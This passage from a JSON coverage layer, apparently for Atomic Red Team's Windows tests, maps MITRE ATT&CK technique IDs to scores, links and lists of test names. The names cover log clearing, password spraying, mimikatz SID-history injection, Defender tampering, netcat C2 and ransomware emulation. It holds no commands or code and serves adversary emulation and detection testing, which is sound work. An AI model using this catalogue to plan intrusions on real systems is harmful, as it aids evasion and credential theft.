Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence 
(HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload 
Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local 